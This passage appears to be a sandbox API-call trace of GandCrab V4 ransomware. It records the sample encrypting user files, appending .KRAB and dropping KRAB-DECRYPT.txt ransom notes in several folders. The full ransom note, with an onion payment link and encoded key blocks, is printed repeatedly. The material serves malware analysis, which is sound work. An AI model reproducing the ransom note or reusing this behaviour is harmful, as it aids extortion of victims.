lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xb0dc, lpOverlapped=0x0) returned 1 [0098.080] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff4f24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.080] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xb0dc, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xb0dc, lpOverlapped=0x0) returned 1 [0098.081] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0098.081] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.084] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.084] CloseHandle (hObject=0x434) returned 1 [0098.084] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.084] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\ukee7sv0fc.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\ukEE7sv0fc.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\ukee7sv0fc.jpg.krab")) returned 1 [0098.085] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.085] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0098.085] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0098.085] CloseHandle (hObject=0x320) returned 1 [0098.085] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.085] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0098.085] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0098.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood" [0098.085] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\" [0098.085] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.086] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.086] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.086] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.086] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.086] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.086] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.086] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\\\KRAB-DECRYPT.txt") returned 49 [0098.086] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\printhood\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.087] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.087] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.087] CloseHandle (hObject=0x320) returned 1 [0098.087] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.088] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.088] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x11d)) [0098.088] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.088] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.088] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.088] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\d2ca4a08d2ca4dee3d.lock") returned 55 [0098.088] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\printhood\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.089] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.089] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.089] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\") returned 32 [0098.089] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*" [0098.089] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\PrintHood\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0098.089] CloseHandle (hObject=0x320) returned 1 [0098.089] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.089] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0098.089] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0098.089] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Recent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent" [0098.089] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent\\" [0098.089] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.089] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.090] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.090] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.090] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.090] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.090] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.090] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\\\KRAB-DECRYPT.txt") returned 46 [0098.090] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\recent\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.091] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0098.091] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0098.091] CloseHandle (hObject=0x320) returned 1 [0098.091] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.091] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.092] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2d, wMilliseconds=0x11d)) [0098.092] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0098.092] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0098.092] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0098.092] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\d2ca4a08d2ca4dee3d.lock") returned 52 [0098.092] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\recent\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0098.092] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.093] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Recent\\") returned 29 [0098.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*" [0098.093] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0098.093] CloseHandle (hObject=0x320) returned 1 [0098.093] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0098.093] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0098.093] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0098.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games" [0098.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\" [0098.093] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0098.093] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0098.093] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0098.093] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0098.093] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0098.093] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.094] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0098.094] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\\\KRAB-DECRYPT.txt") returned 51 [0098.094] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\saved games\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0098.094] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 